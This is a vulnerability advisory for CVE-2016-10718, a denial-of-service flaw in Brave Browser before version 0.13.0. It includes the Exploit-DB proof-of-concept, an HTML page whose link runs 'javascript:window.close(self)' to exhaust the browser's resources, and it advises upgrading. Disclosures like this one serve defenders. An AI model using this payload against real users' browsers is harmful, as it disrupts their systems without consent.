Vendor: Brave Browser
By: Sahil Tikoo
CVSS: 7.5 HIGH
Denial of Service
CWE: 20
Product Name: Brave Browser
Affected Version From: 0.12.5
Affected Version To: 0.13.0
Patch Exists: YES
Related CVE: CVE-2016-10718
CPE: a:brave:brave_browser
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Kali Linux, Ubuntu, Windows OS
2017

Brave Browser < 0.13.0: Denial of Service (resource consumption) via window.close(self) JavaScript code

Brave Browser versions prior to 0.13.0 contain a vulnerability that allows a remote attacker to consume resources on the target system by having the browser execute window.close(self) JavaScript code.

Mitigation:

Upgrade to Brave Browser version 0.13.0 or later.

Exploit-DB raw data:

# Exploit Title: Brave Browser < 0.13.0 Denial of Service (resource consumption) via a window.close(self) js code.
# Date: 2017-10-16
# Exploit Author: Sahil Tikoo
# Vendor Homepage: https://brave.com
# Software Link: https://github.com/brave/browser-laptop
# Version: 0.12.5
# Tested on: Kali Linux, Ubuntu, Windows OS
# CVE : CVE-2016-10718

<html>
<head>
<title>Brave Window Object Remote Denial of Service.</title>
</head>

<body><br><br>
<h1><center>Brave Window Object Remote Denial of Service</center></h1><br><br>
<h2><center>Proof of Concept</center><br><br></h2>

<center>
<b>Click the below link to Trigger the Vulnerability..</b><br><br>
<hr>

<hr>
<!-- The javascript: URL below calls window.close(self) when the link is clicked -->
<b><a href="javascript:window.close(self);">Brave Window Object DoS Test POC</a></b>

</center>
</body>

</html>